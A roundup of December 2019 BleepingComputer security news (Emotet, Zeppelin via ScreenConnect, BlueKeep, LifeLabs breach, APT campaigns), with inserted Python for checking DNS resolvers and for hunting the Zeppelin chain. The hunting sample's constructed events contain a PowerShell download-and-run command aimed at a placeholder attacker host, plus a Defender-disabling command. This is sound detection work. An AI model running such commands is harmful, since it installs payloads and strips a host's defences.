In a Microsoft AMA about Windows 7 hosted on the Microsoft Community Forums yesterday, Woody Leonhard asked if it was true that MSE would no longer receive malware signatures after the January 14th, 2020, EoS date.

Microsoft Employee Mike Cure said that MSE would still get signature updates after January 14th, but shared information from a Windows 7 End of Support FAQ that explains that the Microsoft Security Essentials program will no longer receive updates.

Microsoft post in AMA
While this is surely good news for MSE users on Windows 7, it still does not mean you should continue to use Windows 7 or Microsoft Security Essentials for that matter.

Without a subscription to Windows 7 extended security updates, using the unsupported operating system will open users to vulnerabilities that will no longer be fixed. Furthermore, it is not uncommon for vulnerabilities or bypass methods to be discovered in antivirus software.

Therefore, even if you are willing to risk being affected by new vulnerabilities in Windows 7, it is still possible that malware distributors will come up with methods that bypass detections in Microsoft Security Essentials.

If you are running Windows 7, it is strongly suggested you upgrade your computer to Windows 10, which can still be done for free.


Verizon Fios Internet is Having an Outage, Change DNS to Fix
20.12.2019
Bleepingcomputer  Vulnerability

Verizon Fios is currently having a network-wide DNS outage that is causing users to not be able to connect to websites, retrieve email, or play online games.

BleepingComputer spoke to a Verizon Fios support rep and was told that this outage is network-wide and is being caused by a problem with their DNS servers.

According to DownDetector, this outage is affecting almost all of the United States, especially the east coast.


If you are experiencing issues with the Fios Internet, you can resolve the outage by changing your computer's DNS settings temporarily to a non-Verizon DNS server.

We recommend using either Cloudflare's DNS server at the IP address 1.1.1.1 or Google's DNS server at the IP address 8.8.8.8.

This is a developing story.

Change your DNS servers
If you are using Windows 10, you can change DNS servers by following these steps:

Click the Start button and type Network Status. When the Network Status result appears, click on it to open the screen.
At the Network Status screen, click on Change adapter options.
Find your Ethernet or WiFi connection and right-click on it and select Properties.
Under "This connection uses the following items:", double-click on the Internet Protocol Version 4 (TCP/IP) item to open it.
Select Use the following DNS server addresses and enter either 1.1.1.1 (Cloudflare) or 8.8.8.8 (Google) as your preferred DNS server.
Press OK and then OK again and your Internet should work again.
For Macs, you can follow these steps.
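Before changing settings, it helps to confirm that the resolver is the part that failed: query the ISP resolver and a public resolver directly and compare. The following Python is an added example, not code from the article or Verizon: it builds a minimal DNS A query, sends it over UDP to one resolver and decodes the answer, including compressed names. The ISP resolver address is a TEST-NET placeholder to replace with the one your router hands out, and the sample response bytes (with their address) are constructed.

```python
import socket
import struct

PUBLIC_RESOLVERS = {"Cloudflare": "1.1.1.1", "Google": "8.8.8.8"}
ISP_RESOLVER = "192.0.2.53"   # placeholder (TEST-NET-1): substitute the resolver from ipconfig /all
RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN", 5: "REFUSED"}


def build_query(name, txid=0x1234):
    """Minimal DNS query: header (RD set, one question), QNAME labels, QTYPE A, QCLASS IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)


def _read_name(data, offset):
    """Read a possibly compressed name (RFC 1035 4.1.4); return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                       # compression pointer
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            if end is None:
                end = offset + 2                        # resume after the first pointer
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def parse_response(data, txid=0x1234):
    """Return (rcode, list of IPv4 strings) from a DNS response, walking past the question."""
    rid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid:
        raise ValueError("transaction id mismatch")
    offset = 12
    for _ in range(qdcount):
        _, offset = _read_name(data, offset)
        offset += 4                                     # QTYPE + QCLASS
    ips = []
    for _ in range(ancount):
        _, offset = _read_name(data, offset)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            ips.append(".".join(str(b) for b in data[offset:offset + 4]))
        offset += rdlen
    return flags & 0x000F, ips


def check_resolver(server, name="example.com", timeout=3.0):
    """Ask one resolver directly; returns 'ok <addresses>', an RCODE name, or 'no reply'."""
    query = build_query(name)
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.settimeout(timeout)
            sock.sendto(query, (server, 53))
            data, _ = sock.recvfrom(512)
    except OSError as exc:
        return "no reply (%s)" % exc.__class__.__name__
    rcode, ips = parse_response(data)
    if rcode != 0:
        return RCODES.get(rcode, "RCODE %d" % rcode)
    return ("ok " + ",".join(ips)) if ips else "ok (no A records)"


# Constructed reply to build_query("example.com"): NOERROR with one A record (address is made up).
SAMPLE_RESPONSE = (struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
                   + b"\x07example\x03com\x00" + struct.pack("!HH", 1, 1)
                   + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([93, 184, 216, 34]))

if __name__ == "__main__":
    # A resolver-only outage shows the ISP entry timing out or SERVFAIL while the public ones answer.
    for label, server in [("ISP", ISP_RESOLVER)] + list(PUBLIC_RESOLVERS.items()):
        print("%-10s %-10s %s" % (label, server, check_resolver(server)))
```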


Attackers Posing as German Authorities Distribute Emotet Malware
20.12.2019
Bleepingcomputer  BigBrothers  Virus


An active malspam campaign is distributing Emotet banking Trojan payloads via emails camouflaged to look like messages delivered by several German federal authorities, warns the BSI, Germany's federal cybersecurity agency.

The attackers behind this malicious campaign have already successfully infected a number of federal administration authorities during the last few days according to reports cited by the BSI (also known as the Federal Office for Security in Information Technology — Bundesamt für Sicherheit in der Informationstechnik).

"Spam emails with malicious attachments or links are currently being sent on behalf of several federal agencies," the BSI says.

"The Federal Office for Information Security (BSI) calls for special caution and warns against opening these emails and links."

Emotet malspam sent as replies in previous conversations
Besides these already confirmed Emotet infections, the BSI also suspects that there are more victims. The agency is also actively working with all concerned German authorities to address this threat.

"These are primary infections that lead to further spam emails being sent on behalf of those affected," the BSI adds.

"The authorities have so far not had any harmful effects because the infections have been isolated and cleaned up."

The Emotet spam arrives in the targets' inboxes as replies to already existing email conversations, as part of an effort to make the messages look like authentic correspondence from German federal agencies.

BSI warns against malicious SPAM e-mails delivering Emotet payloads


The BSI recommends checking the emails' sender name and not relying only on the name displayed by the email client. Potential targets should also be aware that such spam emails might also feature various inconsistencies such as misspelled words and out of place formatting.

Users should also make sure not to enable macros when asked by documents arriving via a suspicious email and immediately notify their organization's security team if they opened such an attachment accidentally or on purpose.

"If in doubt, you should clarify by telephone with the alleged sender whether an email was actually sent by the sender," the BSI further recommends.

The ongoing Emotet threat
Emotet is a banking Trojan first detected in 2014 that evolved into a dangerous botnet over time, a botnet used for dropping other malware payloads like the TrickBot banking Trojan, itself known for delivering Ryuk ransomware on compromised machines.

Security researchers say that the Emotet botnet is operated by a threat actor that Proofpoint tracks as TA542 and CrowdStrike knows as Mummy Spider. The group is known for "renting" the Emotet botnet to other actors like the group behind TrickBot.

After a short hiatus starting at the beginning of June, the Emotet command and control (C2) servers suddenly resumed their activity and started delivering malware payloads again on August 22.

Cofense told BleepingComputer at the time that Emotet malspam was coming from 3,362 compromised senders, while the total count of unique domains used in these attacks reached 1,875 covering more than 400 TLDs.

The Emotet botnet arose from the grave yesterday and began serving up new binaries. We noticed that the C2 servers began delivering responses to POST requests around 3PM EST on Aug 21. Stay vigilant and keep an eye out for any updates as we monitor for any changes.

— Cofense Labs (@CofenseLabs) August 22, 2019
After less than a month since it got revived, on September 16, the Emotet botnet started spraying malicious emails around the globe.

Malspam distributing Emotet payloads was discovered as part of attacks directed at a wide range of targets, including individuals, businesses, and government entities from the U.S., Germany, and the United Kingdom.

The Australian Signals Directorate’s Australian Cyber Security Centre provides technical advice on how to defend against Emotet attacks as part of an Emotet advisory published in early November.


ScreenConnect MSP Software Used to Install Zeppelin Ransomware
20.12.2019
Bleepingcomputer  Ransomware

Threat actors are utilizing the ScreenConnect (now called ConnectWise Control) MSP remote management software to compromise a network, steal data, and install the Zeppelin Ransomware on compromised computers.

ConnectWise Control is a remote management software commonly used by MSPs and IT professionals in order to gain access to a remote computer to provide support.

To remotely manage an endpoint workstation, technicians will use the software to create agents that are then installed on the computers they wish to manage. Once the agent is up and running, the computer will appear in the ConnectWise Control Site management software as shown below, where it can then be taken over.

ConnectWise Control Site showing agents
Abusing ConnectWise ScreenConnect
In a new report shared with BleepingComputer, security software firm Morphisec explains how they discovered ScreenConnect being abused by attackers to install the Zeppelin Ransomware and other malware.

"The Zeppelin ransomware was delivered through ScreenConnect, a central web application remote desktop control tool that is designed to allow IT admins to manage remote computers and remotely execute commands on a user’s computer."

Attackers had compromised the network of a large real estate company in the USA and installed the ScreenConnect client on a compromised workstation. Once installed, the client, named ScreenConnect.ClientService.exe, would quietly run in the background while waiting for a remote management connection.

ScreenConnect waiting for connection
The attacker then used the ScreenConnect software to execute a variety of commands that exfiltrate data from backup systems and download malware, post-exploitation tools, and data-stealing Trojans in order to further compromise the network.

In a conversation with Morphisec's Michael Gorelik, BleepingComputer was told that their investigations showed that the actor first attempted to exfiltrate data, steal backup information, and then when finished, installed the Zeppelin Ransomware as a final payload.

"Following additional investigation of the source of infection, we also identified multiple commands specifically targeting Windows data servers. In addition, we discovered a source of data that indicates a data breach, which is currently under investigation by authorities. Of note, we found the actor first tries to exfiltrate information, stealing the backup information and only then propagates the ransomware across the different infected machines"

One command discovered utilizes PowerShell to download and execute a variety of programs on the compromised computer. These programs include the Vidar information-stealing Trojan, bankers, PS2EXE, and Cobalt Strike beacons.

Downloading Vidar and Post-Exploitation Tools
The above software is most likely used to exfiltrate data, steal passwords, and further compromise other computers and servers on the network.

After the data exfiltration and network compromise phase were finished, the actors performed a final attack of installing the Zeppelin Ransomware.

First, a CMD script was executed that prepares the computer for the installation of the ransomware. It does this by installing a Registry file that configures the public encryption key to be used by the ransomware and then attempts to disable Windows Defender by turning off various security features.

Disable Windows Defender before installing Zeppelin Ransomware

Finally, the attacker would execute a PowerShell command that downloads a file named oxfordnew.exe or oxford.exe to the C:\Windows\Temp folder and then execute it. This file is the Zeppelin Ransomware.

Remote PowerShell script that is executed
What makes this particular case interesting is that the attacker deployed the ScreenConnect remote management software themselves.

When we normally cover ransomware attacks that utilize MSP software, it is an MSP that is hacked and the actors using their configured remote management software to infect the MSP's downstream clients.

In this particular case, the threat actors themselves deployed the ScreenConnect software in order to secure a foothold on the network and then compromise other endpoints on it.
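The chain described above leaves a recognisable trail in endpoint telemetry: a remote-control agent spawning a shell, a PowerShell download into C:\Windows\Temp under the file names from this incident, a silent registry import, and Defender being switched off before the payload runs. The following Python is an added example, not Morphisec's or ConnectWise's code: a small hunting rule set run over constructed events. The event fields are an assumed Sysmon-like shape rather than any vendor's schema, the agent path and hostnames are placeholders, and the Defender-tampering indicators are assumed, since the article does not reproduce the CMD script.

```python
import re

RMM_AGENT = "screenconnect.clientservice.exe"          # agent name from the article
SHELLS = {"powershell.exe", "cmd.exe"}
# Common PowerShell download primitives (assumed indicators; the article only says "downloads").
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|bitsadmin", re.I)
# Payload names and drop folder named in the article.
STAGING_PATH = re.compile(r"c:\\windows\\temp\\oxford(?:new)?\.exe", re.I)
# Assumed indicators of Defender tampering (not reproduced in the article).
DEFENDER_TAMPER = re.compile(
    r"set-mppreference\s+-disable|disableantispyware|disablerealtimemonitoring", re.I)
SILENT_REG_IMPORT = re.compile(r"\bregedit(?:\.exe)?\s+/s\b|\breg(?:\.exe)?\s+import\b", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Alert names raised by one event; an empty list means nothing matched."""
    alerts = []
    image = _basename(event.get("image", ""))
    parent = _basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")
    # 1. The remote-control agent spawning a shell is how the operator's commands appear on the host.
    if parent == RMM_AGENT and image in SHELLS:
        alerts.append("rmm_agent_spawned_shell")
        if DOWNLOAD_CRADLE.search(cmd):
            alerts.append("rmm_shell_download_cradle")
        if SILENT_REG_IMPORT.search(cmd):
            alerts.append("rmm_silent_registry_import")
    # 2. Payload staged under the path and names this incident used.
    if STAGING_PATH.search(cmd) or STAGING_PATH.search(event.get("target_file", "")):
        alerts.append("zeppelin_staging_path")
    # 3. Security features switched off ahead of the ransomware run.
    if DEFENDER_TAMPER.search(cmd):
        alerts.append("defender_tamper_attempt")
    return alerts


def hunt(events):
    """Run every event through classify; returns (event id, alert) pairs for triage."""
    return [(event["id"], alert) for event in events for alert in classify(event)]


# Placeholder install path: real agent folders carry an instance-specific suffix.
AGENT = r"C:\Program Files (x86)\ScreenConnect Client (constructed)\ScreenConnect.ClientService.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry; the URL host is a placeholder.
SAMPLE_EVENTS = [
    {"id": 1, "image": AGENT, "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": AGENT},                                # agent service start: not enough alone
    {"id": 2, "image": PS, "parent_image": AGENT,
     "command_line": "powershell.exe -c \"Invoke-WebRequest http://ATTACKER-HOST-PLACEHOLDER/"
                     "oxfordnew.exe -OutFile C:\\Windows\\Temp\\oxfordnew.exe; "
                     "Start-Process C:\\Windows\\Temp\\oxfordnew.exe\""},
    {"id": 3, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -c Get-ChildItem C:\\Windows\\Temp"},   # benign admin use
    {"id": 4, "image": r"C:\Windows\System32\cmd.exe", "parent_image": AGENT,
     "command_line": "cmd.exe /c regedit /s C:\\Windows\\Temp\\prep.reg && "
                     "powershell -c Set-MpPreference -DisableRealtimeMonitoring $true"},
]

if __name__ == "__main__":
    for event_id, alert in hunt(SAMPLE_EVENTS):
        print(event_id, alert)
```

Rule 1 on its own is noisy wherever ScreenConnect is legitimately used, so in practice it is the combination with rules 2 and 3 on the same host within a short window that warrants paging someone.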

More ransomware stealing data
It also shows a continuing and concerning trend where ransomware actors now steal data before deploying the ransomware as a final step.

While we have known for a while that this has been occurring, both the Maze Ransomware and the REvil ransomware variants are now using stolen data as leverage to get victims to pay.

As this becomes more common in ransomware attacks, companies will now need to treat these attacks as data breaches.



FBI Warns of Risks Behind Using Free WiFi While Traveling
20.12.2019
Bleepingcomputer  BigBrothers

The U.S. Federal Bureau of Investigation recommends that travelers avoid connecting their phone, tablet, or computer to free wireless hotspots while traveling during the holiday season.

"This is an open invitation for bad actors to access your device," the FBI Portland field office said in its weekly Tech Tuesday press release.

"They then can load malware, steal your passwords and PINs, or even take remote control of your contacts and camera."

Oversharing and location services are verboten
If there is no other choice and you must use a hotel's or airport's public WiFi network, you should make sure that you go through the provider's connection steps to steer clear of any hotspots set up by malicious actors.

When you must use an unsecured free hotspot, you should keep in mind that connecting to any of your accounts could allow hackers to snoop around on the same network to steal your user credentials or your banking info.

As an even simpler measure to protect your sensitive info while connected to a public WiFi, you can use a virtual private network (VPN) service that encrypts your traffic so that attackers on the same network cannot snoop on it.

A Virtual Private Network, or VPN, is a simple way to keep your communications & internet usage more secure, even when you're using public Wi-Fi networks. Protect your voice & your information: https://t.co/o686GUMukR

— FBI (@FBI) September 18, 2018
The agency also recommends disabling location services on your devices and considering not sharing any info about your travels. This denies criminals a heads-up that you're not at home, which would give them all the info they need to go about their business uninterrupted.

If you have guests staying at your home, consider having them use a separate (guest) network if your router supports it, as a precaution against potentially vulnerable devices connecting to your regular local network.

Smart TVs and IoT devices also need to be secured
The FBI also recommended making sure that your Internet of Things (IoT) devices and smart TVs are properly configured and secured against potential attackers, so that they do not expose your other devices to attacks.

"Unsecured devices can allow hackers a path into your router, giving the bad guy access to everything else on your home network that you thought was secure," the FBI Portland Office said at the time.

To protect your data from hackers attempting to compromise your IoT devices, you should secure your home network by segregating them on a separate network, as well as changing their default passwords to unique, hard-to-crack ones.

FBI's Portland field office also advised smart TV owners to protect themselves against potential snooping by covering their devices' cameras with black tape and by turning off "the microphones, cameras, and collection of personal information if possible."


New BlueKeep Scanner Lets You Find Vulnerable Windows PCs
20.12.2019
Bleepingcomputer  Safety

A new scanning tool is now available for checking if your computer is vulnerable to the BlueKeep security issue in Windows Remote Desktop Services.

Despite Microsoft rolling out a patch in mid-May, tens of thousands of devices still expose a Remote Desktop Protocol (RDP) service to the public internet.

Unpatched systems still at risk
BlueKeep (CVE-2019-0708) is a vulnerability that leads to remote code execution and could be leveraged to spread malware across connected systems without any interaction from the user.

It affects Windows 7, Windows Server 2008 R2, and Windows Server 2008 and is serious enough to warrant repeated warnings from Microsoft about the severity of the flaw and the strong recommendation to apply the patch.

The security community cautioned users and companies early on that leaving the issue unattended could have brutal consequences. So did the U.S. Government after exploiting the bug and achieving remote code execution.

After exploit modules started cropping up and enough information became public, cybercriminals started to exploit BlueKeep in the wild. The payload exploited vulnerable systems en masse for cryptocurrency mining, but it was not a worm that could have brought the attack to WannaCry's level of destruction.

The danger is not over, though. There are plenty of vulnerable systems exposed on the web and cybercriminals are not likely to spare them.

Check yourself
In the U.S. alone, there are at least 45,000 systems with RDP exposed on the web at the time of writing. More than 20,000 hosts vulnerable to BlueKeep are in South Korea, and over 16,000 in Brazil.

And this is only what is directly connected to the public internet. Many unpatched systems may lurk on company networks and are not visible from the outside. In case of a BlueKeep epidemic, these are what cybercriminals are after: from one system, the infection could reach other computers on the network.

Slovakian cybersecurity company ESET released a tool that checks if your computer is vulnerable to BlueKeep or out of harm's way. Their BlueKeep vulnerability scanner can be downloaded from here.

On systems where the flaw can be exploited, the utility launches a web page that provides the appropriate patch from Microsoft. This release has no command-line arguments and deploys like any other executable.


ESET notes that “this is a single-purpose tool intended for personal use and is not intended to be deployed for mass use in an automated environment.”

At least two penetration testing tools include a BlueKeep exploit module, so it is definitely part of security tests. As such, the company recommends that businesses remove vulnerable devices from their networks.

Other scanners exist on the market. Robert Graham created one, and the NCC Group did the same with this tool. Even criminals have included their own version in malware designed for cryptomining, indicating that they are ready to exploit the BlueKeep flaw to reach their goals.


Industrial Cyber-Espionage Campaign Targets Hundreds of Companies
20.12.2019
Bleepingcomputer  CyberSpy

Hundreds of industrial companies are currently the targets of cyber-espionage activity from an advanced threat actor. The adversary uses a new version of an older info-stealer to extract sensitive data and files.

The attacker uses spear-phishing emails with malicious attachments often disguised as PDF files. Separ is the malware of choice, which steals login data from browsers and email clients, also hunting for various types of documents and images.

Victims in multiple countries
Dubbed Gangnam Industrial Style, the campaign compromised at least 200 systems. Almost 60% of the victims are in South Korea, including steel, pipe, and valve manufacturers, an engineering company, and a chemical plant construction company.

A big player among the South Korean victims is a maker of critical infrastructure equipment supplying chemical plants, power transmission and distribution facilities, or firms in the renewable energy sector.

Companies in other countries that fit the same activity profile have also been hit, as researchers from CyberX's threat intelligence team Section 52 discovered compromised systems in Thailand (12.9%), China (5.9%), Japan, Indonesia, Turkey, Ecuador, Germany, and the U.K.

Industrial-themed phishing
The malicious emails from the attacker are specifically created for the recipient. In one of them, the sender posed as an employee of a Siemens subsidiary making a request for quote (RFQ) for designing a power plant in the Czech Republic.

The message included a diagram and a publicly available technical paper on how to run the plant on fuel gas.

In another fake RFQ, the attacker simulated interest in building a coal-fired power plant in Indonesia and pretended to be the engineering subsidiary of a major Japanese conglomerate.

A new breed of Separ malware
CyberX security researchers analyzing the malware used in the Gangnam Industrial Style campaign noticed that it is the Separ info-stealer, publicly documented for the first time in 2013.

However, the variant used in these attacks is an evolved one compared to the capabilities seen by malware analysts in a previous Separ version from early 2019.

In a report today, CyberX notes that the malware relies on the Autorun feature to survive system reboots and comes with a host of mostly freely available tools:

Browser Password Dump v6.0 by SecurityXploded
Email Password Dump v3.0 by SecurityXploded
NcFTPPut 3.2.5 – Free FTP client
The LaZagne Project (password dumper)
deltree (folder delete)
Command Line Process Viewer/Killer/Suspender for Windows NT/2000/XP V2.03
MOVEit Freely 1.0.0.1 – Secure FTP Client
Sleep tool by tricerat
After installation, the malware steals credentials from browsers and email clients and looks for documents that may be important for the attacker based on their file extension.

All collected data is sent using the File Transfer Protocol (FTP) to the free web hosting service freehostia[.]com.

The researchers say that the Gangnam Industrial Style campaign is still active because they are seeing stolen credentials still being delivered to the attacker's command and control server.


Ransomware Hit Over 1,000 U.S. Schools in 2019
20.12.2019
Bleepingcomputer  Ransomware

Since January, 1,039 schools across the U.S. have potentially been hit by ransomware, after 72 school districts and/or educational institutions publicly reported being ransomware victims, according to a report from security solutions provider Armor.

Eleven of those impacted U.S. school districts have had their systems affected by ransomware since late October, with 226 schools directly affected as a result.

"Of the 11 school districts hit in this last attack wave, only 1 has reported having paid the ransom, but did not disclose the sum (Port Neches-Groves), 3 reported having refused to pay (Wood County, Penn-Harris-Madison, Claremont) and 7 have not revealed whether they have paid the ransom or not," Armor's report adds.

Ransomware attacks against schools in 2019

Since the firm previously reported in September that over 500 U.S. schools were hit by ransomware since January, the number of affected schools more than doubled in under three months according to Armor's stats.

To understand the impact a ransomware attack can have when it hits a school district, consider the case of the Las Cruces Public Schools alone: the incident led to the full shutdown of all roughly 30,000 district devices across 42 schools, as well as full hard drive wipes and operating system reinstalls.

Louisiana's Governor John Edwards also declared a state of emergency in late July following a huge wave of ransomware attacks that targeted the state's school districts.

The full list of all 11 school districts hit by ransomware since late October is available in the table embedded below.

District name                                    City, State
Wood County Schools                              Parkersburg, West VA
Port Neches-Groves Independent School District   Port Neches, TX
Penn-Harris-Madison School Corporation           Mishawaka, IN
Livingston New Jersey School District            Livingston, NJ
Chicopee Public Schools                          Chicopee, MA
Claremont Unified School District                Claremont, CA
Sycamore School District 427                     DeKalb, IL
Maine School Administrative District #6          Buxton, ME
Lincoln County                                   Brookhaven, MS
San Bernardino City Unified School District      San Bernardino, CA
Las Cruces Public Schools                        Las Cruces, NM

Overall, spanning all industry sectors, Armor says that it identified public ransomware attack reports from 269 U.S. organizations since January 1, 2019, with municipalities leading in victim count with 82 reports, closely followed by educational entities with 72.

Healthcare orgs have reportedly been impacted by 44 ransomware attacks since the start of 2019, while Managed Service Providers (MSPs) and/or Cloud-Based Service Providers publicly reported 18 ransomware incidents.

Emsisoft confirms the huge numbers
In a separate annual ransomware report published on December 12, Emsisoft says that the impacted educational organizations in 2019 included "86 universities, colleges and school districts, with operations at up to 1,224 individual schools potentially affected."

They also state that 103 state and municipal governments and agencies have also reported ransomware incidents, while healthcare providers were hit by ransomware gangs 759 times throughout 2019.

In a breakdown by industry sector, Emsisoft found that healthcare was at the top of the list of the most popular ransomware targets this year, with roughly 759 healthcare providers hit by such attacks during 2019.

Overall, the anti-malware maker says that ransomware directly impacted "at least 948 government agencies, educational establishments and healthcare providers at a potential cost in excess of $7.5 billion."

Ransomware warnings and mitigation
The Senate passed the 'DHS Cyber Hunt and Incident Response Teams Act' in September to authorize the Department of Homeland Security (DHS) to maintain incident response teams designed to provide private and public entities with help defending against ransomware and cyber-attacks.

FBI's Internet Crime Complaint Center also issued a public service announcement in October regarding the increasing number of high-impact ransomware attacks targeting public and private U.S. organizations.

The FBI advises all U.S. entities currently targeted by a heavy barrage of ransomware attacks to follow these best practices:

• Regularly back up data and verify its integrity
• Focus on awareness and training
• Patch the operating system, software, and firmware on devices
• Enable anti-malware auto-update and perform regular scans
• Implement the least privilege for file, directory, and network share permissions
• Disable macro scripts from Office files transmitted via email
• Implement software restriction policies and controls
• Employ best practices for use of RDP
• Implement application whitelisting
• Implement physical and logical separation of networks and data for different org units
• Require user interaction for end-user apps communicating with uncategorized online assets
Organizations and individuals that have been hit by ransomware are also urged not to pay the ransom but, instead, to reach out to their local FBI field office and to report the incidents to IC3 as soon as possible.

Update December 17, 17:16 EST: Added info from Emsisoft's report on the "State of Ransomware in the US."


LifeLabs Data Breach Exposes Personal Info of 15 Million Customers
20.12.2019
Bleepingcomputer  Incindent

Canadian clinical laboratory services provider LifeLabs has announced a data breach that exposed the personal information of up to 15 million Canadians after an unauthorized user gained access to its systems.

LifeLabs CEO Charles Brown apologized for the data breach that exposed customer information stored on their systems.

"Personally, I want to say I am sorry that this happened. As we manage through this issue, my team and I remain focused on the best interests of our customers. You entrust us with important health information, and we take that responsibility very seriously."

The data breach notification goes on to say that the personal data for up to 15 million customers was accessed by an unauthorized user. This information includes customer names, addresses, emails, logins, passwords, date of birth, and health card numbers.

Of these 15 million customers, approximately 85,000 customers had their lab results exposed as well.

The exposed data was reportedly from 2016 and earlier, and the vast majority of these customers are from B.C. and Ontario.

After discovering the breach, LifeLabs worked with third-party cybersecurity experts to secure the affected systems and purchase the stolen data from the hackers.

It is not known how much they paid for the data.

LifeLabs states that they have already notified privacy commissioners and government partners about the breach and in the "interest of transparency" are releasing the data breach announcement.

What should affected customers do?
For any customer who is concerned about the breach, LifeLabs is offering a free one-year subscription to dark web monitoring and identity theft protection.

"Any customer who is concerned about this incident can receive one free year of protection that includes dark web monitoring and identity theft insurance."

BleepingComputer advises all users affected by this breach to take LifeLabs up on the offer of a free dark web monitoring subscription, as it is very common for attackers to sell stolen information on underground hacker forums.

Furthermore, if you use the same password for your LifeLabs account at other sites, it is strongly advised that you change your passwords at those sites. Everyone should also only use unique passwords when registering at other sites so that a data breach at one site does not affect you at another.

BleepingComputer has reached out to LifeLabs for more information, but has not heard back as of yet.


Windows 10's Fast Ring Becomes a Microsoft Dev Playground
20.12.2019
Bleepingcomputer  OS

Microsoft has officially kicked off the new Windows 10 Fast Ring with the release of its latest Insider build. Under this new Fast Ring, Insiders will always receive the latest code from the Microsoft developers who are creating new features in Windows 10.

In the past, Microsoft had two rings that delivered pre-release development builds for Windows. The Fast Ring was for the next version of Windows 10, and the Skip Ahead Ring was used for testing the feature update after that.

To make it easier to understand, when Insiders in the Fast Ring were testing Windows 10 version 1809, users in the Skip Ahead Ring were testing Windows 10 version 1903.

As this was causing too much confusion for users, Microsoft announced in November that they were no longer going to offer the Skip Ahead Ring and that all future preview releases containing the latest code and features would be in the Fast Ring.

"Going forward, we will not be offering Skip Ahead as an option for Insiders to sign-up for. Our goal is to provide everyone in the Fast ring the freshest builds at the same time."

Starting yesterday, with the release of the Windows 10 v2004 Insider Build 19536, Microsoft clarified their plans for the Fast Ring going forward.

Windows 10 v2004 Build 19536
According to Microsoft, the Fast Ring will always contain the freshest code and newest features, but these features are not tied to a specific Windows 10 release. Instead, they will only be released when they are ready, if at all.

"While features in the active development branch may be slated for a future Windows 10 release, they are no longer matched to a specific Windows 10 release. This means that builds from the active development branch simply reflect the latest work in progress code from our engineers. New features and OS improvements done in this branch during these development cycles will show up in future Windows 10 releases when they are ready. And we may deliver these new features and OS improvements as full OS build updates or servicing releases."

For example, the Windows 10 tabbed window feature called Sets was actively being developed by Microsoft, but they later decided to pull it from the Windows 10 October 2018 Update (Redstone 5) builds that Insiders were testing. It is not known when this feature will make it back into Windows 10 development builds.

The retirement of Skip Ahead and the use of the Fast Ring for all pre-release features and code make things much less confusing for Insiders.

This change also allows all Insiders to test new features, rather than just those in the Skip Ahead Ring, which had a limited number of slots available.


Chinese Rancor APT Refreshes Malware Kit for Espionage Attacks
20.12.2019
Bleepingcomputer  APT

A Chinese-linked hacking group deployed a new malware strain dubbed Dudell as part of attacks targeting Cambodian government organizations between December 2018 and January 2019.

The threat group, tracked as Rancor by Palo Alto Networks' Unit 42, is known to have operated highly targeted cyber-espionage campaigns against targets in South East Asia, including but not limited to Cambodia and Singapore, since at least 2017.

This is not the first time Rancor has been spotted using previously unknown custom malware, as Unit 42 previously observed the group using the DDKONG and PLAINTEE families in attacks carried out in 2017 and 2018.

Custom malware used against government orgs
"Between early December 2018 and the end of January 2019, Rancor conducted at least two rounds of attacks intending to install Derusbi or KHRat malware on victim systems," Unit 42 says.

The DUDELL sample discovered by Unit 42 features similar malicious behavior to another malware sample connected to Rancor, found by Check Point researchers while observing a campaign against several Southeast Asian government entities that spanned over seven months.

Rancor malware malicious behavior (Check Point)
This malware downloader was delivered in the form of a decoy Microsoft Excel document designed to run malicious macros on the target's computer, with the end goal of downloading and executing second stage malware payloads.

"The macro in this document gets executed when the user views the document and clicks Enable Content, at which point the macro locates and executes the data located under the Company field in the document’s properties," the researchers add.

A custom obfuscated VBScript named Chrome.vbs was also used by the Rancor group hackers in attacks from July 2019 to infect their targets with "multiple chained persistent artifacts" to gain persistence on the compromised computers.

VBScript payload execution flow (Unit 42)
Second stage malware payloads
As a second stage payload, the downloader will drop a DDKONG payload that will exfiltrate XOR encoded victim info including hostname, IP address, and locale, as well as various other OS information.

The DDKONG malware can terminate processes on the compromised hosts, list folder contents, download and upload files, execute commands, take screenshots, and even act as a reverse shell to provide the attackers with remote access to the infected systems.

DUDELL was also observed delivering KHRAT payloads, which also come with reverse shell capabilities, as well as Derusbi backdoor Trojans that load additional modules to augment their functionality.

Unit 42 provides a list of indicators of compromise (IOCs) including command and control server addresses and malware sample SHA256 hashes at the end of their Rancor report.


Lazarus Hackers Target Linux, Windows With New Dacls Malware
20.12.2019
Bleepingcomputer  APT  Virus

A new Remote Access Trojan (RAT) malware dubbed Dacls and connected to the Lazarus Group has been spotted by researchers while being used to target both Windows and Linux devices.

The RAT is used by North Korea's state-backed Lazarus Group, as the security researchers at Qihoo 360 Netlab who discovered it speculate in their report.

The threat group (also tracked as HIDDEN COBRA by the United States Intelligence Community and Zinc by Microsoft) is known for hacking Sony Films during late 2014 as part of Operation Blockbuster and for being behind the 2017 global WannaCry ransomware epidemic.

First Linux malware linked to Lazarus
